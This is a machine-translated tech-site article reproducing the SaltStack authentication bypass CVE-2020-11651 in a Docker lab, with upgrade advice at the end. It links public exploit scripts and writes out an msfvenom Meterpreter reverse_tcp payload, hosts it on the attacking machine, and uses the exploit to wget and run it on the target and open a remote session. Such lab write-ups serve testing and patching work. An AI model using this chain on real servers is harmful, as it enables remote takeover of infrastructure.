Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you an example analysis of the recurrence of the SaltStack authentication bypass loophole CVE-2020-11651. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

1. Brief introduction

SaltStack is a set of configuration management tool based on Python. It is a centralized management platform for server infrastructure, with configuration management, remote execution, monitoring and other functions. It is implemented based on Python language and built with lightweight message queuing (ZeroMQ) and Python third-party modules (Pyzmq, PyCrypto, Pyjinjia2, python-msgpack and PyYAML, etc.).

Through the deployment of SaltStack, operation and maintenance personnel can execute commands in batches on tens of millions of servers, configure centralized management, distribute files, collect server data, operating system foundation and software package management according to different businesses. SaltStack is a sharp weapon for operation and maintenance personnel to improve work efficiency and standardize business configuration and operation.

two。 Overview

CVE-2020-11651: authentication bypass vulnerability, attackers achieve the purpose of remote command execution by constructing malicious requests, bypassing the verification logic of Salt Master, and calling relevant unauthorized functions.

3. Scope of impact of vulnerability

SaltStack < 2019.2.4

SaltStack < 3000.2

4. Repair version

2019.2.4

3000.2

5. Vulnerability recurrence 5.1 description of the environment:

Target machine: 192.168.190.128 (ubuntu18.04) (build vulnerability environment based on Docker)

Attack aircraft: 192.168.190.129 (kali2020.4)

Exp: https://github.com/heikanet/CVE-2020-11651-CVE-2020-11652-EXP

5.2 pull image docker pull vulfocus/saltstack-cve_2020_11651

The process of pulling image may be a bit slow. It is recommended to configure docker image accelerator.

Since I have already pulled the image, I will go straight to the next step.

5.3 launch the mirror docker run-d-p 4506-p 4506-p 4505-vulfocus/saltstack-cve_2020_11651

Check to see if docker is on

Docker ps

Environment started successfully

5.4 vulnerability exploitation

1. Install the python salt module

Pip3 install salt

Check to see if salt has been successfully installed

Pip3 list

How to use 2.exp

Python3 CVE-2020-11651.py

3. Try to read the file

4. Try to rebound shell

1. Failed to rebound shell in normal mode

Try a lot of methods, change the exp, change the bounce port number, but all without success ~

two。 Look for the cause of failure

After searching for a long time, I finally found an article. The reason why shell can not be rebounded may be that there is no nc command in the built docker environment.

The test target machine found that the nc command was installed

It suddenly occurred to me that my attack plane kali is version 2020.4, the shell used is zsh;, and the shell type used by ubuntu is bash. I guess this may be the reason why I can't rebound.

An attempt was made to change the shell of kali to bash, but failed ~

3. Upload Trojan horse

Follow the method in the article:

Replace exp: https://github.com/dozernz/cve-2020-11651

Then try to generate a Trojan horse named test on the attack plane.

Msfvenom-a x64-- platform linux-p linux/x64/meterpreter/reverse_tcp LHOST=192.168.190.129 LPORT=6666-I 3-f elf-o test

Turn on the attack plane Apache:

/ etc/init.d/apache2 start

Check to see if apache is on

Service apache2 status

Copy the Trojan to the root of the apache website

Cp test / var/www/html/test

Use exp to execute commands for remote download: (error is a problem with exp scripts)

Python3 CVE-2020-11651.py 192.168.190.128 master 'wget http://192.168.190.129/test|./test'

Add execution permission

Python3 CVE-2020-11651.py 192.168.190.128 master 'chmod + x test |. / test'

4. Turn on monitoring

1. Start msf

Msfconsole

two。 Load module

Use exploit/multi/handler

3. Set up payload

Set payload linux/x64/meterpreter/reverse_tcp

4. Set listening IP&Port

Set lhost 192.168.190.129set lport 6666

5. Execution

Exploit

6. Remote execution of Trojans on target aircraft

Python3 CVE-2020-11651.py 192.168.190.128 master'. / test'

7. Successfully obtained the session

6. Vulnerability repair scheme

SaltStack has officially released the latest version to fix this vulnerability. Relevant users update to the secure version and above in time, and make snapshot backups before upgrading.

Enable SaltStack automatic updates to obtain patches or upgrade to a secure version in real time.

It is forbidden to open the default listening port (4505, 4506) of Salt Master to the public network, and set it to open only to trusted objects.

The above is the example of the recurrence of the SaltStack authentication bypass vulnerability CVE-2020-11651 shared by Xiaobian. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.